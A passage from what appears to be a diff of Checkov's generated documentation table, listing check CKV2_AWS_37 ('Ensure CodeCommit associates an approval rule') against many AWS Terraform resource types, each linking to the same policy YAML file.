[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1319 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1320 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1321 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1322 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1323 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1324 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1325 | CKV2_AWS_37 | 
resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1326 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1327 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1328 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1329 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1330 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1331 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 
1332 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1333 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1334 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1335 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1336 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1337 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1338 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1339 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1340 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1341 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1342 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1343 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1344 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1345 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1346 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1347 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1348 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1349 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1350 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1351 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1352 | 
CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1353 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1354 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1355 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1356 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1357 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1358 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1359 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1360 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1361 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1362 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1363 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1364 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1365 | CKV2_AWS_37 | resource | 
aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1366 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1367 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1368 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1369 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1370 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1371 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1372 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1373 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1374 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1375 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1376 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1377 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1378 | CKV2_AWS_37 | resource | 
aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1379 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1380 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1381 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1382 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1383 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1384 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1385 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1386 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1387 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1388 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1389 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1390 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1391 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1392 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1393 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1394 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1395 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1396 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1397 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1398 | CKV2_AWS_37 | resource | 
aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1399 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1400 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1401 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1402 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1403 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1404 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1405 | 
CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1406 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1407 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1408 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1409 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1410 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1411 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1412 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1413 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1414 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1415 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1416 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1417 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1418 | 
CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1419 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1420 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1421 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1422 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1423 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure 